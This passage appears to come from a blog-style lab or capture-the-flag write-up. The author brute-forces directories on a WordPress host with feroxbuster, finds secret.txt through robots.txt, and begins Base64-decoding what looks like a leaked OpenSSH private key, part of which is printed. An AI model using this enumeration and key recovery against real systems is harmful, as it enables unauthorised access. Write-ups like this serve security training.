data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo feroxbuster -u http://192.168.179.89/ --filter-status 404
                                                                                                                                                                                                                                             
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher &#129299;                 ver: 2.13.0
&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9516;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;
 &#127919;  Target Url            &#9474; http://192.168.179.89/
 &#128681;  In-Scope Url          &#9474; 192.168.179.89
 &#128640;  Threads               &#9474; 50
 &#128214;  Wordlist              &#9474; /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 &#128162;  Status Code Filters   &#9474; [404]
 &#128165;  Timeout (secs)        &#9474; 7
 &#129441;  User-Agent            &#9474; feroxbuster/2.13.0
 &#128137;  Config File           &#9474; /etc/feroxbuster/ferox-config.toml
 &#128270;  Extract Links         &#9474; true
 &#127937;  HTTP methods          &#9474; [GET]
 &#128259;  Recursion Depth       &#9474; 4
 &#127881;  New Version Available &#9474; https://github.com/epi052/feroxbuster/releases/latest
&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9524;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;
 &#127937;  Press [ENTER] to use the Scan Management Menu&#8482;
&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;
200      GET       46l       46w     3502c http://192.168.179.89/secret.txt
403      GET        9l       28w      279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        9l       31w      276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        9l       28w      322c http://192.168.179.89/wp-includes =&gt; http://192.168.179.89/wp-includes/
200      GET       43l       43w     1045c http://192.168.179.89/wp-includes/wlwmanifest.xml
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-widget.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/ms-default-filters.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/update.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/ID3/getid3.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/ID3/module.audio-video.asf.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/ID3/module.tag.lyrics3.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/ID3/module.tag.id3v1.php
200      GET       29l       93w     1361c http://192.168.179.89/wp-includes/ID3/license.txt
405      GET        1l        6w       42c http://192.168.179.89/xmlrpc.php
200      GET       11l      856w    53593c http://192.168.179.89/wp-includes/css/dist/block-library/style.min.css
200      GET       86l      290w     4829c http://192.168.179.89/wp-login.php
301      GET        9l       28w      321c http://192.168.179.89/javascript =&gt; http://192.168.179.89/javascript/
301      GET        9l       28w      321c http://192.168.179.89/wp-content =&gt; http://192.168.179.89/wp-content/
200      GET      452l     1981w    32895c http://192.168.179.89/
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-http.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/embed-template.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-site-query.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/default-widgets.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-locale-switcher.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/canonical.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-matchesmapregex.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/category-template.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-session-tokens.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/plugin.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/ms-deprecated.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-http-streams.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-role.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-walker-comment.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-hook.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-rewrite.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/atomlib.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/feed-atom-comments.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/ms-default-constants.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/bookmark.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-user-query.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/feed-rdf.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/feed-rss2.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-user-meta-session-tokens.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-comment.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-feed.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-http-ixr-client.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-json.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-error.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/class.wp-scripts.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/query.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-fatal-error-handler.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/shortcodes.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-customize-panel.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-image-editor.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-feed-cache.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/taxonomy.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/feed.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/feed-rss2-comments.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-requests.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-term.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-recovery-mode-cookie-service.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-simplepie-file.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-customize-setting.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/compat.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-oembed.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/widgets/class-wp-widget-recent-comments.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/pluggable.php
404      GET      294l     1151w    21109c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-http-requests-hooks.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-customize-manager.php
301      GET        9l       28w      328c http://192.168.179.89/wp-content/themes =&gt; http://192.168.179.89/wp-content/themes/
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-recovery-mode-link-service.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-IXR.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-recovery-mode-email-service.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-smtp.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/Text/Diff.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/IXR/class-IXR-value.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/IXR/class-IXR-date.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/IXR/class-IXR-clientmulticall.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/IXR/class-IXR-message.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/IXR/class-IXR-request.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/spl-autoload-compat.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/user.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/wp-db.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/ms-functions.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/template-loader.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/feed-atom.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-walker-page-dropdown.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-walker-category.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-user.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/media-template.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-taxonomy.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/locale.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/ms-network.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-dependency.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/customize/class-wp-customize-background-position-control.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/customize/class-wp-customize-nav-menu-item-control.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/customize/class-wp-customize-nav-menus-panel.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/customize/class-wp-customize-background-image-setting.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/customize/class-wp-customize-new-menu-section.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/customize/class-wp-customize-background-image-control.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/customize/class-wp-customize-header-image-control.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/customize/class-wp-customize-filter-setting.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/customize/class-wp-customize-nav-menu-item-setting.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/customize/class-wp-customize-new-menu-control.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/customize/class-wp-customize-nav-menu-section.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/customize/class-wp-customize-image-control.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/customize/class-wp-customize-custom-css-setting.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/customize/class-wp-customize-sidebar-section.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/customize/class-wp-customize-site-icon-control.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/customize/class-wp-customize-nav-menu-name-control.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/customize/class-wp-widget-form-customize-control.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/customize/class-wp-customize-nav-menu-auto-add-control.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/customize/class-wp-customize-header-image-setting.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/customize/class-wp-customize-media-control.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/customize/class-wp-customize-nav-menu-locations-control.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/customize/class-wp-customize-themes-panel.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/customize/class-wp-customize-code-editor-control.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/customize/class-wp-customize-selective-refresh.php</code></pre></div><p>While waiting I decide to do manual dangerous discovery like:</p><ul><li><p>robots.txt</p></li><li><p>env</p></li><li><p>.env</p></li><li><p>.git</p></li></ul><p>And many more, you know what I mean.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!-QTD!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F56601304-7ed5-4ed4-9670-692b58d17d52_463x308.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!-QTD!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F56601304-7ed5-4ed4-9670-692b58d17d52_463x308.png 424w, https://substackcdn.com/image/fetch/$s_!-QTD!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F56601304-7ed5-4ed4-9670-692b58d17d52_463x308.png 848w, https://substackcdn.com/image/fetch/$s_!-QTD!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F56601304-7ed5-4ed4-9670-692b58d17d52_463x308.png 1272w, https://substackcdn.com/image/fetch/$s_!-QTD!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F56601304-7ed5-4ed4-9670-692b58d17d52_463x308.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!-QTD!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F56601304-7ed5-4ed4-9670-692b58d17d52_463x308.png" width="463" height="308" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/56601304-7ed5-4ed4-9670-692b58d17d52_463x308.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:308,&quot;width&quot;:463,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:303098,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/189852119?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F56601304-7ed5-4ed4-9670-692b58d17d52_463x308.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!-QTD!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F56601304-7ed5-4ed4-9670-692b58d17d52_463x308.png 424w, https://substackcdn.com/image/fetch/$s_!-QTD!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F56601304-7ed5-4ed4-9670-692b58d17d52_463x308.png 848w, https://substackcdn.com/image/fetch/$s_!-QTD!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F56601304-7ed5-4ed4-9670-692b58d17d52_463x308.png 1272w, https://substackcdn.com/image/fetch/$s_!-QTD!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F56601304-7ed5-4ed4-9670-692b58d17d52_463x308.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Then I found this on robots.txt, it says a secret directory named secret.txt:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!9v-e!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5108e023-8aa8-4730-91c4-f98ee34ebd68_1699x834.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!9v-e!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5108e023-8aa8-4730-91c4-f98ee34ebd68_1699x834.png 424w, https://substackcdn.com/image/fetch/$s_!9v-e!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5108e023-8aa8-4730-91c4-f98ee34ebd68_1699x834.png 848w, https://substackcdn.com/image/fetch/$s_!9v-e!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5108e023-8aa8-4730-91c4-f98ee34ebd68_1699x834.png 1272w, https://substackcdn.com/image/fetch/$s_!9v-e!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5108e023-8aa8-4730-91c4-f98ee34ebd68_1699x834.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!9v-e!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5108e023-8aa8-4730-91c4-f98ee34ebd68_1699x834.png" width="1699" height="834" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/5108e023-8aa8-4730-91c4-f98ee34ebd68_1699x834.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:834,&quot;width&quot;:1699,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:59831,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/189852119?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8815d344-6fb0-4c77-b47b-9e2ce7e4fb31_1699x834.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!9v-e!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5108e023-8aa8-4730-91c4-f98ee34ebd68_1699x834.png 424w, https://substackcdn.com/image/fetch/$s_!9v-e!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5108e023-8aa8-4730-91c4-f98ee34ebd68_1699x834.png 848w, https://substackcdn.com/image/fetch/$s_!9v-e!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5108e023-8aa8-4730-91c4-f98ee34ebd68_1699x834.png 1272w, https://substackcdn.com/image/fetch/$s_!9v-e!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5108e023-8aa8-4730-91c4-f98ee34ebd68_1699x834.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>So I open it and. . .!</p><p>It&#8217;s an encoded strings looking at the text and format I believe this should&#8217;ve been an ID RSA Key:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!jR0U!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0cc6be6e-222e-4fc5-8605-239b373466a5_1699x834.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!jR0U!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0cc6be6e-222e-4fc5-8605-239b373466a5_1699x834.png 424w, https://substackcdn.com/image/fetch/$s_!jR0U!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0cc6be6e-222e-4fc5-8605-239b373466a5_1699x834.png 848w, https://substackcdn.com/image/fetch/$s_!jR0U!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0cc6be6e-222e-4fc5-8605-239b373466a5_1699x834.png 1272w, https://substackcdn.com/image/fetch/$s_!jR0U!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0cc6be6e-222e-4fc5-8605-239b373466a5_1699x834.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!jR0U!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0cc6be6e-222e-4fc5-8605-239b373466a5_1699x834.png" width="1456" height="715" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/0cc6be6e-222e-4fc5-8605-239b373466a5_1699x834.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:715,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:350272,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/189852119?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0cc6be6e-222e-4fc5-8605-239b373466a5_1699x834.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!jR0U!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0cc6be6e-222e-4fc5-8605-239b373466a5_1699x834.png 424w, https://substackcdn.com/image/fetch/$s_!jR0U!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0cc6be6e-222e-4fc5-8605-239b373466a5_1699x834.png 848w, https://substackcdn.com/image/fetch/$s_!jR0U!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0cc6be6e-222e-4fc5-8605-239b373466a5_1699x834.png 1272w, https://substackcdn.com/image/fetch/$s_!jR0U!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0cc6be6e-222e-4fc5-8605-239b373466a5_1699x834.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><ol start="3"><li><p><em>RSA Based64 encoded</em></p></li></ol><p>So I just decode it:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ echo "LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFB
QUFBQkc1dmJtVUFBQUFFYm05dVpRQUFBQUFBQUFBQkFBQUJsd0FBQUFkemMyZ3RjbgpOaEFBQUFB
d0VBQVFBQUFZRUF0SENzU3pIdFVGOEs4dGlPcUVDUVlMcktLckNSc2J2cTZpSUc3UjlnMFdQdjl3
